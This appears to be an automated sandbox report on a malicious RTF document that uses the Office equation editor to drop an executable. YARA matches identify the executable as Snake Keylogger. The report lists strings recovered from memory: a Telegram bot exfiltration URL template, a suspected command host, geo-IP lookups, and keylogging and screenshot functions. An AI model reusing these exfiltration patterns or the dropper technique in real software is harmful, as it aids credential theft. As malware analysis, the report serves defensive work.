                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000244A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: cmnjgyugo61000.exe, 00000005.00000002.414566324.00000000023E8000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20a
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023E5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000244A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000244A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023E5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000244A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.784
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                  Source: cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                  Source: cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                  Source: cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000341D000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.0000000003452000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                  Source: cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                  Source: cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                  Source: cmnjgyugo61000.exe, 00000008.00000002.909020505.0000000003462000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000342A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.0000000003516000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.0000000003408000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034DE000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49183 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Initial sample is an obfuscated RTF file
                  Source: initial sampleStatic file information: Filename: na.doc
                  Malicious sample detected (through community Yara rule)
                  Source: na.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: cmnjgyugo61000.exe PID: 3472, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: cmnjgyugo61000.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\CLLPdgxhnmwGf5Y[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001B4924 NtQueryInformationProcess,5_2_001B4924
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001BA2985_2_001BA298
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001BD6E05_2_001BD6E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001B497B5_2_001B497B
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001B5CA95_2_001B5CA9
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001BDE285_2_001BDE28
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001B81F05_2_001B81F0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001BA28A5_2_001BA28A
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001BA4F75_2_001BA4F7
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001BA5085_2_001BA508
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001B78F85_2_001B78F8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001B49D95_2_001B49D9
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_001B7D305_2_001B7D30
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_005F43105_2_005F4310
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_005F240F5_2_005F240F
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_005F18205_2_005F1820
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_005F24205_2_005F2420
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_005F0A9B5_2_005F0A9B
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_005F0F005_2_005F0F00
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 5_2_005F13385_2_005F1338
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D40F88_2_001D40F8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D390C8_2_001D390C
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D81008_2_001D8100
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D49688_2_001D4968
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D69B88_2_001D69B8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D31B18_2_001D31B1
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D9A4C8_2_001D9A4C
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D43C88_2_001D43C8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D4C388_2_001D4C38
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D74908_2_001D7490
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D34838_2_001D3483
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D5D008_2_001D5D00
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001DDD508_2_001DDD50
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D3E288_2_001D3E28
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D46998_2_001D4699
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D8EC48_2_001D8EC4
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D87E08_2_001D87E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001DE8A88_2_001DE8A8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001DF1D98_2_001DF1D9
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001DFB088_2_001DFB08
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001DDD418_2_001DDD41
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001DED408_2_001DED40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001DD5B88_2_001DD5B8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001DD5C88_2_001DD5C8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001DF6708_2_001DF670
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A16208_2_003A1620
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A48208_2_003A4820
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A7A208_2_003A7A20
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A2C008_2_003A2C00
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A5E008_2_003A5E00
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A90008_2_003A9000
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A1C608_2_003A1C60
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A4E608_2_003A4E60
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A80608_2_003A8060
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A00408_2_003A0040
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A32408_2_003A3240
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A64408_2_003A6440
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A22A08_2_003A22A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A54A08_2_003A54A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A86A08_2_003A86A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A06808_2_003A0680
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A38808_2_003A3880
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A6A808_2_003A6A80
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A28E08_2_003A28E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A5AE08_2_003A5AE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A8CE08_2_003A8CE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A0CC08_2_003A0CC0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A3EC08_2_003A3EC0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A70C08_2_003A70C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A2F208_2_003A2F20
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A61208_2_003A6120
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A93118_2_003A9311
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A13008_2_003A1300
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A45008_2_003A4500
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A77008_2_003A7700
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A03608_2_003A0360
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A35608_2_003A3560
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A67608_2_003A6760
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A19408_2_003A1940
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A4B408_2_003A4B40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A7D408_2_003A7D40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A09A08_2_003A09A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A3BA08_2_003A3BA0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A6DA08_2_003A6DA0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A09908_2_003A0990
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A1F808_2_003A1F80
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A51808_2_003A5180
